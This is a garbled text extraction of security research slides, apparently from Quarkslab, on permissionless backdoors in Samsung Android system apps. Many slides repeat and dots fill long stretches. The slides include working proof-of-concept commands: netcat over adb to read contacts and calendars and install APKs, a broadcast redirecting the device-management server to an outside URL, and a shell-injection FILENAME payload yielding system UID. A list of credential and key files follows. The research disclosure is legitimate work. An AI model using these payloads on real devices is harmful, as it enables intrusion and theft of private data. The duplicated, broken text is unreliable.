1 protected void work()2 {3 if(this.socket != 0)4 {5 socketIS = this.socket.getInputStream();6 socketOS = this.socket.getOutputStream();7 cmdLine = this.readLine(socketIS);8 if((cmdLine != 0) && (cmdLine.length() != 0))9 {
10 cmdInformation = new String[3];11 v5 = cmdLine.indexOf("BEGIN");12 cmdInformation[0] = cmdLine.substring(0, 3);13 if(v5
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 case 70:2 v1 = this.GetContact(cmdInformation[1]);3 v2 = 0;4 break;5 [...]6 case 72:7 v1 = this.GetContactsIndexArray(8 ^^Icom.wssnps.database.smlContactItem$StorageType.
SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());9 v2 = 0;
10 break;11 [...]12 case 90:13 v1 = this.GetCalendar(cmdInformation[1]);14 v2 = 0;15 break;16 [...]17 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 case 70:2 v1 = this.GetContact(cmdInformation[1]);3 v2 = 0;4 break;5 [...]6 case 72:7 v1 = this.GetContactsIndexArray(8 ^^Icom.wssnps.database.smlContactItem$StorageType.
SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());9 v2 = 0;
10 break;11 [...]12 case 90:13 v1 = this.GetCalendar(cmdInformation[1]);14 v2 = 0;15 break;16 [...]17 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 case 70:2 v1 = this.GetContact(cmdInformation[1]);3 v2 = 0;4 break;5 [...]6 case 72:7 v1 = this.GetContactsIndexArray(8 ^^Icom.wssnps.database.smlContactItem$StorageType.
SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());9 v2 = 0;
10 break;11 [...]12 case 90:13 v1 = this.GetCalendar(cmdInformation[1]);14 v2 = 0;15 break;16 [...]17 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 case 453:2 v1 = Integer.valueOf(cmdInformation[1].trim()).intValue();3 if(v1
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 case 453:2 v1 = Integer.valueOf(cmdInformation[1].trim()).intValue();3 if(v1
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 case 453:2 v1 = Integer.valueOf(cmdInformation[1].trim()).intValue();3 if(v1
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
PoC$ adb shell am broadcast -a com.intent.action.KIES_WSSERVICE_STARTBroadcasting: Intent { act=com.intent.action.KIES_WSSERVICE_START }Broadcast completed: result=0$ adb shell netstat |grep 1108tcp6 0 0 :::1108 :::* LISTEN$ adb forward tcp:1108 tcp:1108$ nc localhost 1108 -vConnection to localhost 1108 port [tcp/*] succeeded!
090 1 # getCalendar(1)0BEGIN:VCALENDARVERSION:1.0BEGIN:VEVENTSUMMARY;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Sstic 2013DESCRIPTION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:ConfLOCATION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:RennesDTSTART:20130605T170000ZDTEND:20130607T180000ZX-ALLDAY:UNSETX-CALENDARGROUP:1UID:000000000000000000000000000000000000000000000001END:VEVENTEND:VCALENDAR^^I^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
PoC072 # get the id of contacts on the smartphone (not the SIM)02 # number of contact8,9, # id of the contacts
070 9 # getContact(9)0BEGIN:VCARDVERSION:2.1N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Kevin;;;;;;;TEL;HOME;CELL:06 06 06 06 06EMAIL;HOME;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:[email protected]:1X-ACCOUNT:vnd.sec.contact.phone;vnd.sec.contact.phoneEND:VCARD
453 32 # install APK from /sdcard/restore/
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^^I^^I^^I
Some available features...
C.R.U.D on the SMS/MMS/contacts/memos/calendar/call log/...
Backup of mail accounts
Installation of arbitrary application
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
How it was patched?
Permission added on the component for the actionKIES_WSSERVICE_START
android.permission.COM_WSSNPS has a protectionLevel ofsignatureOrSystem
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Objectives
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Sync for fun and profit
Vuln4 - Sync and remote control applications...
FmmDM, FmmDS, ...
There are applications to do data sync and remote control of thesmartphone
”Security”=> ”Remote controls”
The user can remote control his phone via http://samsungdive.com/
http://www.quarkslab.com
.................................
.......
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Sync for fun and profit
Vuln4 - sync and remote control applications...
Vulnerabilities
These applications export a BroadcastReceiver
With the correct Intent, you can change the default server used forsync and remote control by the smartphone
Poc for FmmDM
shell@android:/ $ am broadcast -a android.intent.action.dsm.UPDATE_URL--es DMServer "http://sh4ka.fr:80/test/trololo.php"^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Sync for fun and profit
Vuln4 - sync and remote control applications...
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Sync for fun and profit
Vuln4 - sync and remote control applications...
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
ASADatabase to the rescue
Search in the database for applications with:
sharedUserId = system
Usage of API for command execution/dynamic code loading
Among these applications: serviceModeApp.apk
A strange AndroidManifest.xml file
1 2 3 4 5 6 8 9
10 11 12 ^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
ASADatabase to the rescue
Search in the database for applications with:
sharedUserId = system
Usage of API for command execution/dynamic code loading
Among these applications: serviceModeApp.apk
A strange AndroidManifest.xml file
1 2 3 4 5 6 8 9
10 11 12 ^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
ASADatabase to the rescue
Search in the database for applications with:
sharedUserId = system
Usage of API for command execution/dynamic code loading
Among these applications: serviceModeApp.apk
A strange AndroidManifest.xml file
1 2 3 4 5 6 8 9
10 11 12 ^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
ASADatabase to the rescue
Search in the database for applications with:
sharedUserId = system
Usage of API for command execution/dynamic code loading
Among these applications: serviceModeApp.apk
A strange AndroidManifest.xml file
1 2 3 4 5 6 8 9
10 11 12 ^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpReceiver.onReceive()
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 String str1 = paramIntent.getAction();4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);5 if (str1.equals("com.android.sec.FTAT_DUMP"))6 {7 String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");8 Calendar localCalendar = Calendar.getInstance();9 String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get
(1));10 ^^I[...]11 String str9 = str8 + new DecimalFormat("00").format(localCalendar.get
(13));12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);14 localIntent2.setFlags(268435456);15 localIntent2.putExtra("FILENAME", str9);16 paramContext.startService(localIntent2);17 }18 [...]19 }20 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpReceiver.onReceive()
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 String str1 = paramIntent.getAction();4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);5 if (str1.equals("com.android.sec.FTAT_DUMP"))6 {7 String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");8 Calendar localCalendar = Calendar.getInstance();9 String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get
(1));10 ^^I[...]11 String str9 = str8 + new DecimalFormat("00").format(localCalendar.get
(13));12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);14 localIntent2.setFlags(268435456);15 localIntent2.putExtra("FILENAME", str9);16 paramContext.startService(localIntent2);17 }18 [...]19 }20 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpReceiver.onReceive()
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 String str1 = paramIntent.getAction();4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);5 if (str1.equals("com.android.sec.FTAT_DUMP"))6 {7 String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");8 Calendar localCalendar = Calendar.getInstance();9 String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get
(1));10 ^^I[...]11 String str9 = str8 + new DecimalFormat("00").format(localCalendar.get
(13));12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);14 localIntent2.setFlags(268435456);15 localIntent2.putExtra("FILENAME", str9);16 paramContext.startService(localIntent2);17 }18 [...]19 }20 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpReceiver.onReceive()
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 String str1 = paramIntent.getAction();4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);5 if (str1.equals("com.android.sec.FTAT_DUMP"))6 {7 String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");8 Calendar localCalendar = Calendar.getInstance();9 String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get
(1));10 ^^I[...]11 String str9 = str8 + new DecimalFormat("00").format(localCalendar.get
(13));12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);14 localIntent2.setFlags(268435456);15 localIntent2.putExtra("FILENAME", str9);16 paramContext.startService(localIntent2);17 }18 [...]19 }20 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpReceiver.onReceive()
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 String str1 = paramIntent.getAction();4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);5 if (str1.equals("com.android.sec.FTAT_DUMP"))6 {7 String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");8 Calendar localCalendar = Calendar.getInstance();9 String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get
(1));10 ^^I[...]11 String str9 = str8 + new DecimalFormat("00").format(localCalendar.get
(13));12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);14 localIntent2.setFlags(268435456);15 localIntent2.putExtra("FILENAME", str9);16 paramContext.startService(localIntent2);17 }18 [...]19 }20 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.onStartCommand()
1 public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)2 {3 Log.i("FTATDumpService", "onStartCommand()");4 this.mHandler.sendEmptyMessage(1005);5 final String str = paramIntent.getStringExtra("FILENAME");6 [...]7 new Thread(new Runnable()8 {9 public void run()
10 {11 FTATDumpService.this.sendMessage(12 FTATDumpService.access$600(FTATDumpService.this),13 FTATDumpService.this.mHandler.obtainMessage(1014)14 );15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "
.log"))16 FTATDumpService.this.mHandler.sendEmptyMessage(1015);17 ^^I [...]18 }19 }).start();20 return 0;21 }22 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.onStartCommand()
1 public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)2 {3 Log.i("FTATDumpService", "onStartCommand()");4 this.mHandler.sendEmptyMessage(1005);5 final String str = paramIntent.getStringExtra("FILENAME");6 [...]7 new Thread(new Runnable()8 {9 public void run()
10 {11 FTATDumpService.this.sendMessage(12 FTATDumpService.access$600(FTATDumpService.this),13 FTATDumpService.this.mHandler.obtainMessage(1014)14 );15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "
.log"))16 FTATDumpService.this.mHandler.sendEmptyMessage(1015);17 ^^I [...]18 }19 }).start();20 return 0;21 }22 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.onStartCommand()
1 public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)2 {3 Log.i("FTATDumpService", "onStartCommand()");4 this.mHandler.sendEmptyMessage(1005);5 final String str = paramIntent.getStringExtra("FILENAME");6 [...]7 new Thread(new Runnable()8 {9 public void run()
10 {11 FTATDumpService.this.sendMessage(12 FTATDumpService.access$600(FTATDumpService.this),13 FTATDumpService.this.mHandler.obtainMessage(1014)14 );15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "
.log"))16 FTATDumpService.this.mHandler.sendEmptyMessage(1015);17 ^^I [...]18 }19 }).start();20 return 0;21 }22 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.onStartCommand()
1 public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)2 {3 Log.i("FTATDumpService", "onStartCommand()");4 this.mHandler.sendEmptyMessage(1005);5 final String str = paramIntent.getStringExtra("FILENAME");6 [...]7 new Thread(new Runnable()8 {9 public void run()
10 {11 FTATDumpService.this.sendMessage(12 FTATDumpService.access$600(FTATDumpService.this),13 FTATDumpService.this.mHandler.obtainMessage(1014)14 );15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "
.log"))16 FTATDumpService.this.mHandler.sendEmptyMessage(1015);17 ^^I [...]18 }19 }).start();20 return 0;21 }22 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.onStartCommand()
1 public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)2 {3 Log.i("FTATDumpService", "onStartCommand()");4 this.mHandler.sendEmptyMessage(1005);5 final String str = paramIntent.getStringExtra("FILENAME");6 [...]7 new Thread(new Runnable()8 {9 public void run()
10 {11 FTATDumpService.this.sendMessage(12 FTATDumpService.access$600(FTATDumpService.this),13 FTATDumpService.this.mHandler.obtainMessage(1014)14 );15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "
.log"))16 FTATDumpService.this.mHandler.sendEmptyMessage(1015);17 ^^I [...]18 }19 }).start();20 return 0;21 }22 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.doShellCmd()
1 private boolean DoShellCmd(String paramString)2 {3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramString);4 String[] arrayOfString = new String[3];5 arrayOfString[0] = "/system/bin/sh";6 arrayOfString[1] = "-c";7 arrayOfString[2] = paramString;8 Log.i("FTATDumpService", "exec␣command");9 Runtime.getRuntime().exec(arrayOfString).waitFor();
10 Log.i("FTATDumpService", "exec␣done");11 Log.i("FTATDumpService", "DoShellCmd␣done");12 return true;13 }14 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.doShellCmd()
1 private boolean DoShellCmd(String paramString)2 {3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramString);4 String[] arrayOfString = new String[3];5 arrayOfString[0] = "/system/bin/sh";6 arrayOfString[1] = "-c";7 arrayOfString[2] = paramString;8 Log.i("FTATDumpService", "exec␣command");9 Runtime.getRuntime().exec(arrayOfString).waitFor();
10 Log.i("FTATDumpService", "exec␣done");11 Log.i("FTATDumpService", "DoShellCmd␣done");12 return true;13 }14 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.doShellCmd()
1 private boolean DoShellCmd(String paramString)2 {3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramString);4 String[] arrayOfString = new String[3];5 arrayOfString[0] = "/system/bin/sh";6 arrayOfString[1] = "-c";7 arrayOfString[2] = paramString;8 Log.i("FTATDumpService", "exec␣command");9 Runtime.getRuntime().exec(arrayOfString).waitFor();
10 Log.i("FTATDumpService", "exec␣done");11 Log.i("FTATDumpService", "DoShellCmd␣done");12 return true;13 }14 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
FTATDumpService.doShellCmd()
1 private boolean DoShellCmd(String paramString)2 {3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramString);4 String[] arrayOfString = new String[3];5 arrayOfString[0] = "/system/bin/sh";6 arrayOfString[1] = "-c";7 arrayOfString[2] = paramString;8 Log.i("FTATDumpService", "exec␣command");9 Runtime.getRuntime().exec(arrayOfString).waitFor();
10 Log.i("FTATDumpService", "exec␣done");11 Log.i("FTATDumpService", "DoShellCmd␣done");12 return true;13 }14 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Srsly?
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Vuln5 - serviceModeApp.apk
PoC
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP--es FILENAME ’../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#’Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0$ adb shell cat /sdcard/shellescapeuid=1000(system) gid=1000(system) groups=1001(radio),1006(camera),1007(log),1015(sdcard_rw),1023(media_rw),1028(sdcard_r),2001(cache),3001(net_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct)^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Inventory of the permissions obtained
Inventory
Combination of all the permissions of sharedUserId=systemapplications
A total of 156 permissionsLike android.permission.INSTALL_PACKAGE (pm installpackage.apk)Like access to mail accounts, SMS, internet, ...
We can inject code inside other applications (dalvik-cache)
Sensitive informations can be read
Wifi keys: /data/misc/wifi/wpa supplicant.conf
Password/pincode/pattern: guesture.key, password.key, ...
Mail accounts and Google Account token:/data/system/user/X/accounts.db
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I dont need root when i have system
Objectives
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitationSamsung MDM for fun and lazinessI can haz your sms?
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Samsung MDM for fun and laziness
The Samsung’s MDM : SAFE
Discovery of SAFE
SAmsung For Enterprise: A framework for Samsung models
Expose an API for the commercial MDMsUsed partly by SamsungDive
Implemented partly in /system/framework/services.odex
Study of the permission system
Many modules : BrowserPolicy, DevicePolicy, ...
Each module checks that the calling application has the correctpermission:
One permission per module : android.permission.sec.MDM_XXXEnforcement via enforceXXXPermission()
SAFE : The god mode
The framework doesn’t check the permission when the calling applicationis system (UID = 1000)
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Samsung MDM for fun and laziness
The Samsung’s MDM : SAFE
Discovery of SAFE
SAmsung For Enterprise: A framework for Samsung models
Expose an API for the commercial MDMsUsed partly by SamsungDive
Implemented partly in /system/framework/services.odex
Study of the permission system
Many modules : BrowserPolicy, DevicePolicy, ...
Each module checks that the calling application has the correctpermission:
One permission per module : android.permission.sec.MDM_XXXEnforcement via enforceXXXPermission()
SAFE : The god mode
The framework doesn’t check the permission when the calling applicationis system (UID = 1000)
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Samsung MDM for fun and laziness
SAFE: The god mode
MDM Usage without any restriction
The features implemented (for us?):
Application Policy - application backup, application uninstall, ...Mail Account Policy - Manage mail accounts, behaviour whenSSL certificates are invalid, ...Enterprise VPN Policy - Retrieving of the certificates, passwords,...Phone Restriction - Block WiFi, VPN connection, USB Debug,OTA firmware updates, reset to factory settings, ...Misc Policy - Retrieve the clipboard content, ...
We can ”infect” someone and prevent him from receiving firmwareupdates that corrects vulnerabilities.
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
I can haz your sms?
SMS Forwarding
DSMLawmo.apk
Study of the applications listening for incomming SMS
BroadcastReceiver listening for Intent with actionandroid.provider.Telephony.SMS_RECEIVED
